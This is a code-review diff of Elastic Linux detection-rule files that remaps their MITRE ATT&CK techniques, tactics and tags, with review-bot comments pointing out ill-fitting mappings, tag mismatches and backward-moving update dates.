[[rule.threat]]
framework = "MITRE ATT&CK"
+[rule.threat.tactic]
+name = "Defense Evasion"
+id = "TA0005"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+id = "T1564.002"
+name = "Hidden Users"
+reference = "https://attack.mitre.org/techniques/T1564/002/"
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
[rule.new_terms]
field = "new_terms_fields"
value = ["process.executable"]
diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
index b3d9a7b222f..1ac5aa2f508 100644
--- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
+++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/21"
integration = ["endpoint", "crowdstrike"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/04"
[rule]
author = ["Elastic"]
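Review bot: The new mapping T1564.002 (Hidden Users) describes adversaries concealing user accounts they create or modify; an interactive shell spawned under an existing system account is neither hidden nor newly created, so the sub-technique does not describe what the rule's query (outside the hunk) looks for. T1059.004 under Execution, which this hunk removes, did describe the observable; if a Defense Evasion mapping is wanted in addition, T1078 (Valid Accounts, which ATT&CK also lists under Defense Evasion) is the closer fit for abuse of a service account. The tags hunk above swaps `"Tactic: Execution"` for `"Tactic: Defense Evasion"` to match, so the two hunks must change together.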
@@ -126,30 +126,45 @@ sequence by host.id, process.parent.entity_id with maxspan=3s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
+ [rule.threat.tactic]
+ name = "Defense Evasion"
+ id = "TA0005"
+ reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
+ [[rule.threat.technique]]
+ name = "Obfuscated Files or Information"
+ id = "T1027"
+ reference = "https://attack.mitre.org/techniques/T1027/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+ [[rule.threat.technique]]
+ name = "Deobfuscate/Decode Files or Information"
+ id = "T1140"
+ reference = "https://attack.mitre.org/techniques/T1140/"
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+ [rule.threat.tactic]
+ name = "Execution"
+ id = "TA0002"
+ reference = "https://attack.mitre.org/tactics/TA0002/"
+
+ [[rule.threat.technique]]
+ id = "T1059"
+ name = "Command and Scripting Interpreter"
+ reference = "https://attack.mitre.org/techniques/T1059/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Unix Shell"
+ id = "T1059.004"
+ reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+ [[rule.threat.technique]]
+ name = "User Execution"
+ id = "T1204"
+ reference = "https://attack.mitre.org/techniques/T1204/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Malicious File"
+ id = "T1204.002"
+ reference = "https://attack.mitre.org/techniques/T1204/002/"
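Review bot: T1204.002 (Malicious File) is added to the Execution entry although the rule is a decode-then-interpreter sequence (`sequence by host.id, process.parent.entity_id`) that needs no user to open a file; T1059.004 alone describes the observable, so drop the T1204/T1204.002 blocks unless user-launched droppers are in scope. The key order is also inconsistent within this single hunk: the tactic, T1027, T1140, T1204 and sub-technique blocks put `name` before `id`, while the T1059 block puts `id` first; use one order for the file.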
diff --git a/rules/linux/defense_evasion_journalctl_clear_logs.toml b/rules/linux/defense_evasion_journalctl_clear_logs.toml
index aa909745f68..093b7354d19 100644
--- a/rules/linux/defense_evasion_journalctl_clear_logs.toml
+++ b/rules/linux/defense_evasion_journalctl_clear_logs.toml
@@ -2,7 +2,7 @@ creation_date = "2025/10/01"
integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
@@ -117,6 +117,16 @@ id = "T1070.002"
name = "Clear Linux or Mac System Logs"
reference = "https://attack.mitre.org/techniques/T1070/002/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml
index 8a9075839fa..b2f955b40de 100644
--- a/rules/linux/defense_evasion_kernel_module_removal.toml
+++ b/rules/linux/defense_evasion_kernel_module_removal.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/24"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
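Review bot: Adding T1562.001 (Disable or Modify Tools) to a journal-clearing rule overstates what is observed: vacuuming or rotating journald logs destroys evidence, which the existing T1070.002 already captures, whereas .001 is about disabling or reconfiguring security tooling. If the extra mapping is meant to say that a telemetry source was impaired, use the parent `T1562` without the sub-technique and say so in the description; otherwise remove the two added technique blocks.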
@@ -135,3 +135,21 @@ reference = "https://attack.mitre.org/techniques/T1562/001/"
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml
index bc14d0952b7..68a5e17a6e7 100644
--- a/rules/linux/defense_evasion_kill_command_executed.toml
+++ b/rules/linux/defense_evasion_kill_command_executed.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/21"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
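Review bot: The new Persistence entry maps module removal to T1547.006 (Kernel Modules and Extensions), which describes loading a module so it runs at boot; unloading one is the defense-evasion half already covered by the T1562.001 mapping in the context above. Unless the rule's query (outside the hunk) also matches module loading, this entry should be dropped. No tags hunk for this file appears in the patch, so if the entry stays, `"Tactic: Persistence"` must be added to `tags` to keep tags and threat in step.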
@@ -103,20 +103,49 @@ process.name:(kill or pkill or killall) and not (
[[rule.threat]]
framework = "MITRE ATT&CK"
+[rule.threat.tactic]
+name = "Defense Evasion"
+id = "TA0005"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1564.001"
+name = "Hidden Files and Directories"
+reference = "https://attack.mitre.org/techniques/T1564/001/"
+
[[rule.threat.technique]]
-id = "T1562"
name = "Impair Defenses"
+id = "T1562"
reference = "https://attack.mitre.org/techniques/T1562/"
[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
+name = "Indicator Blocking"
+id = "T1562.006"
+reference = "https://attack.mitre.org/techniques/T1562/006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+name = "Execution"
+id = "TA0002"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
[rule.new_terms]
field = "new_terms_fields"
value = ["host.id", "process.parent.executable"]
diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml
index bac0dbe6c01..847734d3990 100644
--- a/rules/linux/defense_evasion_kthreadd_masquerading.toml
+++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml
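Review bot: Two of the new mappings do not fit a `kill`/`pkill`/`killall` rule: T1564.001 (Hidden Files and Directories) has nothing to do with terminating processes, and replacing T1562.001 with T1562.006 (Indicator Blocking) moves from the sub-technique ATT&CK uses for killing security-tool processes to one about suppressing telemetry collection. Keep `T1562.001` (restore the three removed `id`/`name`/`reference` lines) and drop the T1564/T1564.001 blocks. The hunk also adds an Execution tactic with T1059.004 while no tags hunk for this file is in the patch, so `"Tactic: Execution"` must be added to `tags` outside the hunk or the tag and threat lists will disagree.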
@@ -2,7 +2,7 @@ creation_date = "2024/02/01"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
@@ -112,9 +112,14 @@ name = "Masquerading"
reference = "https://attack.mitre.org/techniques/T1036/"
[[rule.threat.technique.subtechnique]]
-id = "T1036.005"
-name = "Match Legitimate Resource Name or Location"
-reference = "https://attack.mitre.org/techniques/T1036/005/"
+id = "T1036.004"
+name = "Masquerade Task or Service"
+reference = "https://attack.mitre.org/techniques/T1036/004/"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
[rule.threat.tactic]
id = "TA0005"
diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml
index 5b6c4da06bc..3ac9270442c 100644
--- a/rules/linux/defense_evasion_ld_preload_cmdline.toml
+++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/30"
integration = ["endpoint", "crowdstrike"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
@@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+]
timestamp_override = "event.ingested"
type = "new_terms"
query = '''
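Review bot: Swapping T1036.005 (Match Legitimate Resource Name or Location) for T1036.004 (Masquerade Task or Service) looks like a regression for the kthreadd rule: a process naming itself after `kthreadd` is matching a legitimate name, which is .005, whereas .004 is about scheduled tasks and services. Revert the three changed `id`/`name`/`reference` lines to T1036.005. The added parent T1564 (Hide Artifacts) has no sub-technique and duplicates what the masquerading mapping already says; if it stays, the description should state what is being hidden.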
@@ -102,20 +111,57 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*)
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
+ [rule.threat.tactic]
+ name = "Defense Evasion"
+ id = "TA0005"
+ reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat.technique.subtechnique]]
-id = "T1574.006"
-name = "Dynamic Linker Hijacking"
-reference = "https://attack.mitre.org/techniques/T1574/006/"
+ [[rule.threat.technique]]
+ name = "Hijack Execution Flow"
+ id = "T1574"
+ reference = "https://attack.mitre.org/techniques/T1574/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Dynamic Linker Hijacking"
+ id = "T1574.006"
+ reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Persistence"
+ id = "TA0003"
+ reference = "https://attack.mitre.org/tactics/TA0003/"
+
+ [[rule.threat.technique]]
+ name = "Hijack Execution Flow"
+ id = "T1574"
+ reference = "https://attack.mitre.org/techniques/T1574/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Dynamic Linker Hijacking"
+ id = "T1574.006"
+ reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Privilege Escalation"
+ id = "TA0004"
+ reference = "https://attack.mitre.org/tactics/TA0004/"
+
+ [[rule.threat.technique]]
+ name = "Hijack Execution Flow"
+ id = "T1574"
+ reference = "https://attack.mitre.org/techniques/T1574/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Dynamic Linker Hijacking"
+ id = "T1574.006"
+ reference = "https://attack.mitre.org/techniques/T1574/006/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.new_terms]
field = "new_terms_fields"
value = ["process.parent.name",
"process.command_line", "host.id"] diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml index fcf1c7d2429..8559b7e0144 100644 --- a/rules/linux/defense_evasion_ld_so_creation.toml +++ b/rules/linux/defense_evasion_ld_so_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -80,7 +80,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -108,6 +119,37 @@ not (
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1574"
name = "Hijack Execution Flow"
diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
index 1f605570a16..14c9ecdfc1d 100644
--- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
+++ b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
@@ -2,7 +2,7 @@ creation_date = "2025/07/24"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
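Review bot: The new Defense Evasion entry maps this rule to T1218 (System Binary Proxy Execution), which describes running a payload through a trusted binary such as the loader; the file is named for ld.so creation and the query is outside the hunk, so confirm the rule actually observes execution via `ld.so` before keeping T1218, and otherwise rely on the existing T1574 entry (whose tactic block follows the hunk). The Execution entry with T1059.004 is fine if a shell is part of the observed chain. The tags hunk above adds both new tactics, so tag/threat parity holds for this file.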
@@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
type = "eql"
query = '''
sequence by process.parent.entity_id with maxspan=3s
@@ -112,12 +120,45 @@ sequence by process.parent.entity_id with maxspan=3s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
+ [rule.threat.tactic]
+ name = "Defense Evasion"
+ id = "TA0005"
+ reference = "https://attack.mitre.org/tactics/TA0005/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+ [[rule.threat.technique]]
+ name = "Obfuscated Files or Information"
+ id = "T1027"
+ reference = "https://attack.mitre.org/techniques/T1027/"
+
+ [[rule.threat.technique]]
+ name = "Deobfuscate/Decode Files or Information"
+ id = "T1140"
+ reference = "https://attack.mitre.org/techniques/T1140/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ name = "Execution"
+ id = "TA0002"
+ reference = "https://attack.mitre.org/tactics/TA0002/"
+
+ [[rule.threat.technique]]
+ id = "T1059"
+ name = "Command and Scripting Interpreter"
+ reference = "https://attack.mitre.org/techniques/T1059/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Unix Shell"
+ id = "T1059.004"
+ reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+ [[rule.threat.technique]]
+ name = "User Execution"
+ id = "T1204"
+ reference = "https://attack.mitre.org/techniques/T1204/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Malicious File"
+ id = "T1204.002"
+ reference = "https://attack.mitre.org/techniques/T1204/002/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
index 6be08ce102a..105dced6160 100644
--- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
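Review bot: T1204.002 (Malicious File) is added to the Execution entry of a rule keyed on a base64-decoding sequence (`sequence by process.parent.entity_id`), which needs no user to open a file; keep T1059.004 and drop the T1204/T1204.002 blocks unless user-launched files are in scope. Within this one hunk the key order differs block to block (`name` before `id` in the tactic, T1027, T1140, T1204 and sub-technique blocks; `id` first in T1059); use a single order.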
@@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/05"
 
 [rule]
 author = ["Elastic"]
@@ -91,7 +91,21 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "Domain: Container",
+ "Domain: Kubernetes",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Discovery",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Auditd Manager",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Defend for Containers",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -120,6 +134,11 @@ id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
 
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
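Review bot: The tags now carry `Tactic: Discovery`, but the threat section of this file maps only Defense Evasion in this hunk and Credential Access in the next one, so `Tactic: Credential Access` is missing and `Tactic: Discovery` has no matching `[[rule.threat]]` entry unless one exists outside the shown hunks; a tag/tactic consistency check would report both gaps. Either add the Discovery mapping or change the tag to `"Tactic: Credential Access",`. Separately, `updated_date` moves backwards from 2026/03/23 to 2026/02/05 while this file's tags and mappings change, and the same date regression appears in every rule file of this patch; if this is a deliberate revert of the 03/23 edits that is fine, otherwise the date should reflect the change being made.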
@@ -129,11 +148,16 @@ reference = "https://attack.mitre.org/tactics/TA0005/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
index 6da26421c09..f68521c8f2e 100644
--- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/05"
 
 [rule]
 author = ["Elastic"]
@@ -148,6 +148,11 @@ id = "T1036.003"
 name = "Rename Legitimate Utilities"
 reference = "https://attack.mitre.org/techniques/T1036/003/"
 
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_potential_proot_exploits.toml b/rules/linux/defense_evasion_potential_proot_exploits.toml
index ba241949298..1761b636315 100644
--- a/rules/linux/defense_evasion_potential_proot_exploits.toml
+++ b/rules/linux/defense_evasion_potential_proot_exploits.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/03/07"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
 
 [rule]
 author = ["Elastic"]
@@ -89,7 +89,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -101,24 +111,11 @@ process.parent.name == "proot"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1211"
+name = "Exploitation for Defense Evasion"
+reference = "https://attack.mitre.org/techniques/T1211/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_prctl_process_name_tampering.toml b/rules/linux/defense_evasion_prctl_process_name_tampering.toml
index 914dd6c4c6f..12d0ba4e5fe 100644
--- a/rules/linux/defense_evasion_prctl_process_name_tampering.toml +++ b/rules/linux/defense_evasion_prctl_process_name_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.011" -name = "Overwrite Process Arguments" -reference = "https://attack.mitre.org/techniques/T1036/011/" +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml index abe2549a743..42658fe2b44 100644 --- a/rules/linux/defense_evasion_rename_esxi_files.toml +++ b/rules/linux/defense_evasion_rename_esxi_files.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
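Review bot: The sub-technique swap in the prctl hunk replaces `T1036.011` "Overwrite Process Arguments" with `T1036.005` "Match Legitimate Resource Name or Location"; for a rule whose file name says it detects prctl-based process name tampering, the removed entry's name describes the observed behaviour more directly, while the new one covers naming a binary or path after a legitimate one. If the remap is driven by something not visible here (for example an ATT&CK release the target stack does not yet ship), a short `min_stack_comments` or commit note would spare the next reviewer the same question; otherwise consider keeping `id = "T1036.011"`.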
@@ -103,21 +110,16 @@ VMware ESXi files are critical for virtual machine operations, storing configura framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[[rule.threat.technique]] -id = "T1491" -name = "Defacement" -reference = "https://attack.mitre.org/techniques/T1491/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1491.001" -name = "Internal Defacement" -reference = "https://attack.mitre.org/techniques/T1491/001/" +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_ssl_certificate_deletion.toml b/rules/linux/defense_evasion_ssl_certificate_deletion.toml index 2254deba1ee..d5ec0c2be7b 100644 --- a/rules/linux/defense_evasion_ssl_certificate_deletion.toml 